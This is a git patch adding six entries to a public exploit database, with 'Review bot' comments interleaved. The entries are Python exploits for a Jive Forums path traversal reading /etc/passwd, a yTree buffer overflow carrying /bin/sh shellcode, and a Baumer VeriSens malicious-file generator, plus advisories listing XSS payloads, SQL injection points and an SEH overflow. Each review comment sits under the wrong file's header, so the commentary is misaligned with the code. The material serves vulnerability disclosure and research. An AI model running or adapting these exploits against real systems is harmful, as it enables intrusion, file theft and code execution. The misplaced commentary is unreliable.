From 1221dcb78e977508f414db75db7b188e99a134cf Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Thu, 4 Feb 2016 05:01:40 +0000
Subject: [PATCH] DB: 2016-02-04 6 new exploits
---
files.csv | 6 ++
platforms/hardware/webapps/39407.txt | 50 ++++++++++++++++
platforms/jsp/webapps/39405.py | 61 +++++++++++++++++++
platforms/linux/dos/39406.py | 72 ++++++++++++++++++++++
platforms/php/webapps/39404.txt | 37 ++++++++++++
platforms/windows/dos/39158.txt | 48 +++++++++++++++
platforms/windows/dos/39403.py | 90 ++++++++++++++++++++++++++++
7 files changed, 364 insertions(+)
create mode 100755 platforms/hardware/webapps/39407.txt
create mode 100755 platforms/jsp/webapps/39405.py
create mode 100755 platforms/linux/dos/39406.py
create mode 100755 platforms/php/webapps/39404.txt
create mode 100755 platforms/windows/dos/39158.txt
create mode 100755 platforms/windows/dos/39403.py
diff --git a/files.csv b/files.csv
index f1bd7b91d..31f402f1f 100755
--- a/files.csv
+++ b/files.csv
@@ -35413,6 +35413,7 @@ id,file,description,date,author,platform,type,port
 39155,platforms/linux/remote/39155.txt,"lxml 'clean_html' Function Security Bypass Vulnerability",2014-04-15,"Maksim Kochkin",linux,remote,0
 39156,platforms/cgi/webapps/39156.txt,"ZamFoo Multiple Remote Command Execution Vulnerabilities",2014-04-02,Al-Shabaab,cgi,webapps,0
 39157,platforms/php/webapps/39157.txt,"Puntopy 'novedad.php' SQL Injection Vulnerability",2014-04-06,"Felipe Andrian Peixoto",php,webapps,0
+39158,platforms/windows/dos/39158.txt,"Advanced Encryption Package Buffer Overflow - DoS",2016-01-03,Vishnu,windows,dos,0
 39159,platforms/windows/local/39159.py,"FTPShell Client 5.24 - Add to Favorites Buffer Overflow",2016-01-04,INSECT.B,windows,local,0
 39160,platforms/lin_x86/shellcode/39160.c,"Linux/x86 execve _/bin/sh_ - shellcode 24 byte",2016-01-04,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0
 39161,platforms/windows/remote/39161.py,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)",2016-01-04,"Avinash Thapa",windows,remote,0
@@ -35641,3 +35642,8 @@ id,file,description,date,author,platform,type,port
 39400,platforms/windows/dos/39400.pl,"Toshiba Viewer v2 p3console - Local Denial of Service",2016-02-02,JaMbA,windows,dos,0
 39401,platforms/multiple/dos/39401.txt,"pdfium - opj_t2_read_packet_header (libopenjpeg) Heap Use-After-Free",2016-02-02,"Google Security Research",multiple,dos,0
 39402,platforms/jsp/webapps/39402.txt,"eClinicalWorks (CCMR) - Multiple Vulnerabilities",2016-02-02,"Jerold Hoong",jsp,webapps,80
+39403,platforms/windows/dos/39403.py,"Baumer VeriSens Application Suite 2.6.2 - Buffer Overflow Vulnerability",2016-02-03,LiquidWorm,windows,dos,0
+39404,platforms/php/webapps/39404.txt,"Timeclock Software 0.995 - Multiple SQL Iinjection Vulnerabilities",2016-02-03,Benetrix,php,webapps,80
+39405,platforms/jsp/webapps/39405.py,"Jive Forums <= 5.5.25 - Directory Traversal Vulnerability",2016-02-03,"Zhaohuan of Tencent Security",jsp,webapps,80
+39406,platforms/linux/dos/39406.py,"yTree 1.94-1.1 - Local Buffer Overflow",2016-02-03,"Juan Sacco",linux,dos,0
+39407,platforms/hardware/webapps/39407.txt,"Viprinet Multichannel VPN Router 300 - Stored XSS Vulnerabilities",2016-02-03,Portcullis,hardware,webapps,0
diff --git a/platforms/hardware/webapps/39407.txt b/platforms/hardware/webapps/39407.txt
new file mode 100755
index 000000000..5bf88b380
--- /dev/null
+++ b/platforms/hardware/webapps/39407.txt
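Review bot: The new 39404 row's description reads `Multiple SQL Iinjection Vulnerabilities`; the doubled letter in `Iinjection` should be `Injection`, since this field is what catalogue searches match against. The 39407 Viprinet row is a `webapps` entry but carries port `0`, while the neighbouring webapps rows (39402, 39404, 39405) use `80`; if the advisory concerns the device's HTTP management interface, `80` would be the consistent value, otherwise the reason for `0` is worth a word in the commit.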
@@ -0,0 +1,50 @@
+
+Vulnerability title: Multiple Instances Of Cross-site Scripting In Viprinet Multichannel VPN Router 300
+
+CVE: CVE-2014-2045
+
+Vendor: Viprinet
+
+Product: Multichannel VPN Router 300
+
+Affected version: 2013070830/2013080900
+
+Fixed version: 2014013131/2014020702
+Reported by: Tim Brown
+Details:
+
+ The data supplied to both the `old’ and `new’ web applications (the device has two web based management interfaces) was permanently stored and could be retrieved later by other users. This is a normal feature of many applications, however, in this instance the application failed to restrict the type of data that could be stored and also failed to sanitise it, meaning that it could not be safely rendered by the browser.
+
+ Stored cross-site scripting could be triggered by:
+
+
+ Attempting to login with a username of `’ (affects `old’ interface and results in post-authentication cross-site Scripting when a legitimate administrator views the realtime log)
+ Creating an account with a username of `’ (affects both `old’ and `new’ interfaces once created)
+ Setting the device’s hostname to `’ (affects `old’ interface once created)
+
+
+ A number of locations were identified as being vulnerable to reflective attacks, including:
+
+
+http:///exec?module=config&sessionid=&inspect=%3Cscript%20src=http://localhost:9090%3E%3C/script%3E
+http:///exec?tool=atcommands&sessionid=&sourceobject=WANINTERFACELIST.OBJECT__0&module=configtools&commands=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
+http:///exec?tool=ping&sessionid=&sourceobject=WANINTERFACELIST.OBJECT__0&module=configtools&host=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&pingcount=3&databytes=56
+
+
+ The inclusion of session IDs in all URLs partially mitigates the reflective cross-site scripting but could itself be considered a vulnerability since it is included in referred headers and log files.
+
+ These are simply some examples of how this attack might be performed, and the it is believed that both the `old’ and `new’ web applications are systemically vulnerable to this.
+
+
+
+Further details at:
+
+ https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2045/
+
+
+
+Copyright:
+Copyright (c) Portcullis Computer Security Limited 2015, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
+
+Disclaimer:
+The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
diff --git a/platforms/jsp/webapps/39405.py b/platforms/jsp/webapps/39405.py
new file mode 100755
index 000000000..77de84b4d
--- /dev/null
+++ b/platforms/jsp/webapps/39405.py
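Review bot: The three trigger bullets under `Stored cross-site scripting could be triggered by:` read `a username of `’` with nothing between the quotes, and the reflected examples begin `http:///exec?...` with an empty host, so the illustrative values appear to have been dropped somewhere between the original advisory and this file; a reader will otherwise take the empty quotes literally, so either restore the text from the linked Portcullis advisory or use an explicit marker such as `[value elided]`. In the session-ID paragraph `referred headers` should read `Referer headers`. The sentence `and the it is believed that` has a stray `the`.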
@@ -0,0 +1,61 @@ +''' +JiveForums <=5.5.25 Directory Traversal Vulnerability + +Description +========== +Jive forums is a widely recognized network community. Its products have been used by global IT giants including IBM, HP, Oracle, Adobe, Cisco, Intel, Amazon, Emc, Mcafee, Rapid7, Fireeye, etc. +The version of JiveForums <=5.5.25 and < 4.0 are vulnerable to a directory traversal security issue, other versions may also be affected. + +Details +======= +Product: JiveSoftware +Security-Risk: high +Remote-Exploit: yes +Vendor-URL: https://www.jivesoftware.com + +Credits +============ +Discovered by: Zhaohuan of Tencent Security +Site: http://security.tencent.com + +Affected Products: +================= +Test on JiveForums 5.5.25/5.5.20/5.5.7/3.2.10/2.6.2 +maybe work <= 5.5.25 + +Exploit: +============ +''' + +#!/usr/bin/python +# Author: Zhaohuan || http://weibo.com/hackyou +# Google Dork: inurl:servlet/JiveServlet +# Tested on JiveForums 5.5.25/5.5.20/5.5.7/3.2.10/2.6.2 +# +# Software Link: https://www.jivesoftware.com + +import urllib2 +import sys + +print "JiveForums <=5.5.25 Directory Traversal Exploit" + +if len(sys.argv) != 3: + print "[-] Trying exploit on : " + print "[*] Usage: %s http://localhost /jiveforums/" % sys.argv[0] + sys.exit() + +payload = 'servlet/JiveServlet?attachImage=true&attachment=/.././.././.././.././.././.././.././../etc/./passwd%00&contentType=image%2Fpjpeg' +print "[+] Trying to request :"+sys.argv[1]+sys.argv[2]+payload +response=urllib2.urlopen(sys.argv[1]+sys.argv[2]+payload) +readvul=response.read() +print readvul + + +''' +Solution: +============ +Update to jiveforums 5.5.30 or the latest version. + +More Information: +https://www.jivesoftware.com/services-support/ +''' \ No newline at end of file diff --git a/platforms/linux/dos/39406.py b/platforms/linux/dos/39406.py new file mode 100755 index 000000000..e8dc4bec9 --- /dev/null +++ b/platforms/linux/dos/39406.py 
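Review bot: The `#!/usr/bin/python` line sits after the module docstring, so it is an ordinary comment rather than a shebang; the file is created with mode 100755 but will not run via its executable bit unless that line is moved to line 1 (the docstring can follow it). The usage branch prints `[-] Trying exploit on : ` with nothing after the colon before the real usage line, which reads like a truncated message; drop it or change it to `[-] Missing arguments`. The script is Python 2 only (`print` statements, `urllib2`), which the header should say since the `Tested on` line lists only JiveForums versions. The `Solution:` text lives in a trailing string literal below the code; moving it into the header docstring keeps the remediation (`Update to jiveforums 5.5.30 or the latest version`) visible to readers who stop at the top of the file.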
@@ -0,0 +1,72 @@ +# Exploit Author: Juan Sacco - http://www.exploitpack.com -jsacco@exploitpack.com +# Program affected: yTree - File manager for terminals v1.94-1.1 +# Description: yTree is prone to a stack-based overflow, an attacker could exploit +# this issue to execute arbitrary code in the context of the application. +# Failed exploit attempts will result in a denial-of-service condition. +# +# Tested and developed on: Kali Linux 2.0 x86 - https://www.kali.org +# +# Program Description: This is a file manager that separates files from directories +# and allows you to select and manage files from different directories. +# It works on black and white or color terminals and is UTF-8 locales aware. +# Vendor homepage: http://www.han.de/~werner/ytree.html +# Kali Linux 2.0 package: pool/main/y/ytree/ytree_1.94-1.1_i386.deb +# MD5sum: 7d55d9c7e8afb4405c149463613f596b +# +# Program received signal SIGSEGV, Segmentation fault. +# --------------------------------------------------------------------------[regs] +# EAX: 0x41414141 EBX: 0xB7FB8000 ECX: 0x00000000 EDX: 0x08071342 o d I t s z a P c +# ESI: 0xBFFFF134 EDI: 0x41414141 EBP: 0x0806FC60 ESP: 0xBFFFDC50 EIP: 0xB7F888C1 +# CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007B +# --------------------------------------------------------------------------[code] +# => 0xb7f888c1 : mov eax,DWORD PTR [eax+0x4c] +# 0xb7f888c4 : mov DWORD PTR [esp+0x24],eax +# 0xb7f888c8 : mov eax,DWORD PTR [edi+0x50] +# 0xb7f888cb : mov DWORD PTR [esp+0x28],eax +# 0xb7f888cf : mov eax,DWORD PTR [edi+0x54] +# 0xb7f888d2 : mov DWORD PTR [esp+0x2c],eax +# 0xb7f888d6 : mov eax,DWORD PTR [edi+0x58] +# 0xb7f888d9 : mov DWORD PTR [esp+0x30],eax +# -------------------------------------------------------------------------------- +# 0xb7f888c1 in werase () from /lib/i386-linux-gnu/libncursesw.so.5 +# gdb$ backtrace +# 0 0xb7f888c1 in werase () from /lib/i386-linux-gnu/libncursesw.so.5 +# 1 0x08050f43 in ?? () +# 2 0x08051182 in ?? 
() +# 3 0x0805972f in ?? () +# 4 0x0804a68a in ?? () +# 5 0xb7d82a63 in __libc_start_main (main=0x804a560, argc=0x2, argv=0xbffff294, init=0x8064df0, fini=0x8064de0, rtld_fini=0xb7fedc90 <_dl_fini>, stack_end=0xbffff28c) at libc-start.c:287 +# 6 0x0804a701 in ?? () + +import os,subprocess +def run(): + try: + print "# yTree Buffer Overflow by Juan Sacco" + print "# It's fuzzing time on unusable exploits" + print "# This exploit is for educational purposes only" + # JUNK + SHELLCODE + NOPS + EIP + + junk = "\x41"*65 + shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + nops = "\x90"*1200 + eip = "\xd0\xf6\xff\xbf" + subprocess.call(["ytree",' ', junk + shellcode + nops + eip]) + + except OSError as e: + if e.errno == os.errno.ENOENT: + print "Sorry, yTree not found!" + else: + print "Error executing exploit" + raise + +def howtousage(): + print "Snap! Something went wrong" + sys.exit(-1) + +if __name__ == '__main__': + try: + print "Exploit yTree v1.94-1.1 Local Overflow Exploit" + print "Author: Juan Sacco" + except IndexError: + howtousage() +run() diff --git a/platforms/php/webapps/39404.txt b/platforms/php/webapps/39404.txt new file mode 100755 index 000000000..4e797684e --- /dev/null +++ b/platforms/php/webapps/39404.txt 
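Review bot: `howtousage()` calls `sys.exit(-1)` but the only import is `import os,subprocess`, so reaching that path raises `NameError` instead of exiting; change the import to `import os, subprocess, sys`. In `run()`, `e.errno == os.errno.ENOENT` relies on `os.errno`, an accidental re-export rather than documented API (and gone in Python 3.7+); `import errno` and compare against `errno.ENOENT`. The `try`/`except IndexError` under `__main__` wraps only two `print` statements, which cannot raise `IndexError`, and `run()` is called outside it anyway, so the handler is dead code and should be removed. The header asserts arbitrary code execution while the catalogue files this under `dos`; a sentence stating what was actually observed (the SIGSEGV in `werase()` shown in the backtrace) would make the impact claim match the evidence.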
@@ -0,0 +1,37 @@
+#############################
+Exploit Title : Timeclock-software - Multiple SQL injections
+Author:Marcela Benetrix
+Date: 01/27/2016
+version: 0.995 (older version may be vulnerable too)
+software link:http://timeclock-software.net
+
+#############################
+Timeclock software
+
+Timeclock-software.net's free software product will be a simple solution to
+allow your employees to record their time in one central location for easy
+access.
+
+##########################
+SQL Injection Location
+
+1. http://server/login.php
+username and password were vulnerable to time-based blind sql injection
+type.
+
+Moreover, once logged into the app; the following URLs were found to be
+vulnerable too:
+
+2. http://server/view_data.php?period_id
+3. http://server/edit_type.php?type_id=
+4. http://server/edit_user.php?user_id=
+5. http://server/edit_entry.php?time_id=
+
+All of them are vulnerable to Union query and time-based blind.
+
+
+##########################
+Vendor Notification
+01/27/2016 to: the developers. They replied immediately and fixed the
+problem in a new release
+002/03/2016: Disclosure
diff --git a/platforms/windows/dos/39158.txt b/platforms/windows/dos/39158.txt
new file mode 100755
index 000000000..cc3656f91
--- /dev/null
+++ b/platforms/windows/dos/39158.txt
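Review bot: The vendor-notification paragraph says the developers `fixed the problem in a new release` but never names that release, so a defender reading this cannot tell whether an installed copy is patched; add the fixed version number next to the 0.995 affected version. The last timeline entry `002/03/2016: Disclosure` has a stray leading zero and presumably means `02/03/2016`, matching the catalogue date 2016-02-03. Item 1 ends `time-based blind sql injection type.`, leaving `type.` dangling; `injection.` closes the sentence, and `older version may be vulnerable too` should be `older versions`.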
@@ -0,0 +1,48 @@
+Dear List,
+
+Greetings from vishnu (@dH4wk)
+
+1. Vulnerable Product
+
+ - Advanced Encryption Package
+ - Company http://www.aeppro.com/
+
+2. Vulnerability Information
+
+ (A) Buffer OverFlow
+ Impact: Attacker gains administrative access
+ Remotely Exploitable: No
+ Locally Exploitable: Yes
+
+
+3. Vulnerability Description
+ A 1006 byte causes the overflow. It is due to the inefficient/improper
+handling of exception. This is an SEH based stack overflow and is
+exploitable..
+
+4. Reproduction:
+ It can be reproduced by pasting 1006 "A"s or any characters in the
+field where the key file is asked during encryption of "*TEXT TO ENCRYPT *"
+tab..
+
+
+
+*Windbg Output*
+==============================================================
+(a34.a38): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+*** ERROR: Module load completed but symbols could not be loaded for
+image00000000`00400000
+image00000000_00400000+0x19c0:
+004019c0 f00fc108 lock xadd dword ptr [eax],ecx
+ds:002b:4141413d=????????
+
+(a34.a38): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+41414141 ??
+==============================================================
+
+Regards,
+Vishnu Raju.
diff --git a/platforms/windows/dos/39403.py b/platforms/windows/dos/39403.py
new file mode 100755
index 000000000..29870cee8
--- /dev/null
+++ b/platforms/windows/dos/39403.py
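Review bot: The advisory never states which version of Advanced Encryption Package was tested or is affected — section 1 gives only the product name and company URL — so neither the catalogue row nor a reader can determine exposure; add an `Affected version:` line and, if known, whether the vendor was notified. `Impact: Attacker gains administrative access` is not substantiated by the rest of the write-up, which describes a crash from a 1006-byte value typed into a local GUI field, is marked `Remotely Exploitable: No`, and is filed under `dos`; `Impact: application crash (SEH overwrite; exploitability asserted, not demonstrated)` would reflect what the Windbg output shows. The sentence `A 1006 byte causes the overflow.` should read `A 1006-byte input causes the overflow.`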
@@ -0,0 +1,90 @@ +#!/usr/bin/env python +# +# +# Baumer VeriSens Application Suite 2.6.2 Buffer Overflow Vulnerability +# +# +# Vendor: Baumer Holding AG | Baumer Optronic GmbH +# Product web page: http://www.baumer.com +# Software link: http://www.baumer.com/us-en/products/identification-image-processing/software-and-starter-kits/verisens-application-suite/ +# Affected version: 2.6.2 (ID-CS-XF-XC) +# +# Summary: The Baumer Application Suite is the intuitive configuration +# software for VeriSens vision sensors, which makes it quick and simple +# for even new users to implement image processing tasks. Starting with +# the creation of test tasks through to the management of jobs, the program +# will take you through just a few steps to reach your goal. +# +# Desc: The vulnerability is caused due to a boundary error in baselibs.dll +# library when processing device job file, which can be exploited to cause +# a buffer overflow when a user opens e.g. a specially crafted .APP file. +# Successful exploitation could allow execution of arbitrary code on the +# affected machine. +# +# ------------------------------------------------------------------------- +# (78c.cb0): Access violation - code c0000005 (first chance) +# First chance exceptions are reported before any exception handling. +# This exception may be expected and handled. +# Exported symbols for C:\Program Files (x86)\Baumer\VeriSens Application Suite v2.6.2\AppSuite\baselibs.dll - +# eax=4d81ab45 ebx=4d81ab45 ecx=41414141 edx=41414141 esi=4d81ab45 edi=0c17e010 +# eip=56bc4186 esp=0040a020 ebp=0040a020 iopl=0 nv up ei pl nz na po nc +# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210202 +# baselibs!b_Int_restore+0x6: +# 56bc4186 8b00 mov eax,dword ptr [eax] ds:002b:4d81ab45=???????? 
+# 0:000> u +# baselibs!b_Int_restore+0x6: +# 56bc4186 8b00 mov eax,dword ptr [eax] +# 56bc4188 8bc8 mov ecx,eax +# 56bc418a 8bd0 mov edx,eax +# 56bc418c c1ea18 shr edx,18h +# 56bc418f c1f908 sar ecx,8 +# 56bc4192 81e100ff0000 and ecx,0FF00h +# 56bc4198 0bca or ecx,edx +# 56bc419a 8bd0 mov edx,eax +# 0:000> dds +# 56bc6b86 00107d80 +# 56bc6b8a 8b117457 +# 56bc6b8e f0e181cb +# 56bc6b92 e8000000 +# 56bc6b96 fffff9e6 +# 56bc6b9a 02ebf88b +# 56bc6b9e ff85fa8b +# 56bc6ba6 68000001 +# 56bc6baa 56c2afa4 baselibs!VsInfoFeed::Listener::`vftable'+0xb154 +# 56bc6bae 3f8ce857 +# 56bc6bb2 c483ffff +# 56bc6bb6 75c0850c USER32!SetKeyboardState+0x705a +# 56bc6bba 325b5f07 +# ------------------------------------------------------------------------- +# +# Tested on: Microsoft Windows 7 Professional SP1 (EN) +# Microsoft Windows 7 Ultimate SP1 (EN) +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2016-5303 +# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5303.php +# +# +# 14.11.2015 +# + +header = ("\x00\x00\x00\x01\x00\x00\x00\x04\x95\xCF\x82\xF6\x00\x00\x00" + "\x01\x00\x00\x00\x04\x00\x00\x00\x2B\x00\x00\x00\x50\x00\x00" + " \x00\x05\x43\x6F\x64\x65\x00\x00\x00\x00\x50\x00\x00\x00\x01" + "\x00\x00\x00\x00\x50\x00\x00\x00") #\x0F + +buffer = "\x41" * 6719 + "\x42\x42\x42\x42" + +f = open ("exploit.app", "w") +f.write(header + buffer +'\x0F') +f.close() +print "File exploit.app created!\n" + +# +# PoC: http://www.zeroscience.mk/codes/bvas-5303.app.zip +# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39403.zip +#
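Review bot: `open ("exploit.app", "w")` writes binary data in text mode; on the Windows 7 hosts listed under `Tested on`, any 0x0A byte would be rewritten as 0x0D 0x0A. The header and filler currently contain no 0x0A, so the output happens to be correct today, but the idiom should be `with open("exploit.app", "wb") as f:` so the file does not silently change if the header is edited. The third `header` fragment appears to begin with a literal space inside the quotes (`" \x00\x05\x43\x6F\x64\x65…"`), which would emit a 0x20 byte into the header; if that is a line-wrapping artefact rather than part of the format it should be removed, so it is worth confirming against the upstream PoC. The comment block describes the root cause in `baselibs.dll` but gives no vendor response or fixed version; a `Fix:` or `Vendor status:` line is what a defender reading the catalogue needs.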